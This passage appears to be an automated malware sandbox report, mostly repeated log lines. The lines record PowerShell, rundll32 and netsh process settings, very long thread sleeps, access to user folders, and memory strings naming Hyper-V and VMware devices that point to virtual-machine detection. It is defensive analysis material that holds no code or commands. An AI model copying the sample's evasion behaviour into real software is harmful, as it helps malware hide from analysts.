    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8454Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1115Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8379
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1236
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5752
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1994
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep count: 8454 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5020Thread sleep count: 1115 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -5534023222112862s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7424Thread sleep count: 5752 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7428Thread sleep count: 1994 > 30
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7452Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\rundll32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\OneDrive\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Videos\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Users\user\Music\desktop.iniJump to behavior
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$D
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002A7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8O
    Source: rundll32.exe, 00000003.00000002.1924040267.0000000002C5A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.1924040267.0000000002CF1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1933821234.000000000343D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1933821234.00000000033AA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000E.00000002.2006335358.0000000002B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: rundll32.exe, 0000000E.00000002.2006335358.0000000002A7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
